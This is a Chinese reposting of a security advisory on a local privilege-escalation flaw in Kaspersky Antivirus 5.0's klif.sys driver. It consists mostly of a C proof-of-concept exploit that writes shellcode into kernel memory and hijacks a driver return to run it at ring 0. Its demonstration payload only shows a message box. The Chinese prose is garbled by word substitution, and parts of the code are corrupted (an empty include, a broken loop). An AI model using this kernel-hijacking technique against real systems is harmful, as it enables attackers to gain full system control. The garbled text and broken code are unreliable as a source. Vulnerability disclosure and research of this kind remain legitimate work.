Kaspersky杀毒软件klif.sys权限提升漏洞

  受影响系统：
  Kaspersky Labs Kaspersky Antivirus 5.0.335
  Kaspersky Labs Kaspersky Antivirus 5.0.228
  Kaspersky Labs Kaspersky Antivirus 5.0.227
  形貌：
  --------------------------------------------------------------------------------
  BUGTRAQ  ID: 13878
  Kaspersky是一款十分盛行的杀毒软件。
  Microsoft Windows 2000平台的Kaspersky软件计划上存在毛病，当地攻击者可能使用此毛病提升自己的权限。
  起因是Kaspersky内核驱动klif.sys没有正确抛弃高权限，攻击者可能使用这个毛病以系统内核的权限实行恣意代码。
  <*泉源：Ilya Rabinovich （info@softsphere.com）
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=111817777430401&w=2
  *>
  测试方法：
  --------------------------------------------------------------------------------
  警 告
  以下步伐(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自尊！
  //(C) by Ilya Rabinovich.
  #include
  PUCHAR pCodeBase=(PUCHAR)0xBE9372C0;
  PDWORD pJmpAddress=(PDWORD)0xBE9372B0;
  PUCHAR pKAVRets[]={(PUCHAR)0xBE935087,(PUCHAR)0xBE935046};
  PUCHAR pKAVRet;
  unsigned char code[]={0x68,0x00,0x02,0x00,0x00,    //push 0x200
  0x68,0x00,0x80,0x93,0xBE,    //push - 0xBE938000
  0x6A,0x00,                    //push 0 
  0xB8,0x00,0x00,0x00,0x00,    //mov eax, -> +13
  0xFF,0xD0,                    //call eax
  0x68,0x00,0x80,0x93,0xBE,    //push
  0x68,0x00,0x82,0x93,0xBE,    //push

- 0xBE938200
  0xB8,0x00,0x00,0x00,0x00,    //mov eax, -> +30
  0xFF,0xD0,                    //call eax
  0x85,0xC0,                    //test eax,eax
  0x74,0x03,                    //je +03
  0xC2,0x04,0x00,                //retn 4
  0x6A,0x00,                    //push 0
  0x68,0x00,0x84,0x93,0xBE,    //push

- 0xBE938400
  0x68,0x00,0x84,0x93,0xBE,    //push

- 0xBE938400
  0x6A,0x00,                    //push 0
  0xB8,0x00,0x00,0x00,0x00,    //mov eax, -> +58
  0xFF,0xD0,                    //call eax
  0xC2,0x04,0x00                //retn 4
  };
  unsigned char jmp_code[]={0xFF,0x25,0xB0,0x72,0x93,0xBE}; //jmp dword prt \
  [0xBE9372B0]
  //////////////////////////////////////////////////////////////
  BOOLEAN LoadExploitIntoKernelMemory(void){
  //Get function's addresses
  HANDLE hKernel=GetModuleHandle("KERNEL32.DLL");
  HANDLE hUser=GetModuleHandle("USER32.DLL");
  FARPROC pGetModuleFileNameA=GetProcAddress(hKernel,"GetModuleFileNameA");
  FARPROC plstrcmpiA=GetProcAddress(hKernel,"lstrcmpiA");
  FARPROC pMessageBoxA=GetProcAddress(hUser,"MessageBoxA");
  *(DWORD*)(code+13)=(DWORD)pGetModuleFileNameA;
  *(DWORD*)(code+30)=(DWORD)plstrcmpiA;
  *(DWORD*)(code+58)=(DWORD)pMessageBoxA;
  //Prepare our data into ring0-zone.
  PCHAR pNotepadName=(PCHAR)0xBE938200;
  char temp_buffer[MAX_PATH];
  char *s;
  SearchPath(NULL,"NOTEPAD",".EXE",sizeof(temp_buffer),temp_buffer,&s);
  lstrcpy(pNotepadName,temp_buffer);
  PCHAR pMessage=(PCHAR)0xBE938400;
  lstrcpy(pMessage,"Notepad is running!!! KAV is vulnerable!!!");
  memmove(pCodeBase,code,sizeof(code));
  *pJmpAddress=(DWORD)pCodeBase;
  memmove(pKAVRet,jmp_code,sizeof(jmp_code));
  return TRUE;
  }
  ///////////////////////////////////////////////////////////////
  void UnloadExploitFromKernelMemory(){
  UCHAR retn_4[]={0xC2,0x04,0x00};
  memmove(pKAVRet,retn_4,sizeof(retn_4));
  }
  /////////////////////////////////////////////////////////////////
  PUCHAR GetKAVRetAddress(void){
  //Check the retn 4 in the KAV 0xBE9334E1 function end
  //Also, we check the KAV klif.sys existance.
  UCHAR retn_4[]={0xC2,0x04,0x00};
  __try{
  for(DWORD i=0;i   if(memcmp(pKAVRets[i],retn_4,sizeof(retn_4))==0)
  return pKAVRets[i];
  }
  }__except(EXCEPTION_EXECUTE_HANDLER){MessageBox(NULL,"KAV is not \
  installed",NULL,0);return NULL;}
  MessageBox(NULL,"Wrong KAV version. You need 5.0.227, 5.0.228 or 5.0.335 versions of \
  KAV",NULL,0);  return NULL;
  }
  /////////////////////////////////////////////////////////////////
  void main(void){
  pKAVRet=GetKAVRetAddress();
  if(NULL==pKAVRet)
  return;
  if(!LoadExploitIntoKernelMemory())
  return;
  char temp_buffer[MAX_PATH];
  char *s;
  SearchPath(NULL,"NOTEPAD",".EXE",sizeof(temp_buffer),temp_buffer,&s);
  PROCESS_INFORMATION pi;
  STARTUPINFO si={0};
  si.cb=sizeof(si);
  CreateProcess(NULL,temp_buffer,NULL,NULL,FALSE,
  0,NULL,NULL,&si,&pi);
  WaitForSingleObject(pi.hProcess,INFINITE);
  MessageBox(NULL,"Now you may start your own Notepad instance to check this \
  exploit!","KAV_EXPLOITER",0);
  MessageBox(NULL,"Close this window to stop exploitation","KAV_EXPLOITER",0);
  UnloadExploitFromKernelMemory();
  }
  发起：
  --------------------------------------------------------------------------------
  厂商补丁：
  Kaspersky Labs
  --------------
  现在厂商还没有提供补丁大概晋级步伐，我们发起使用此软件的用户随时存眷厂商的主页以获取最新版本：
  http://www.kaspersky.com/
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:

评论加载中... 内容： 评论者： 验证码：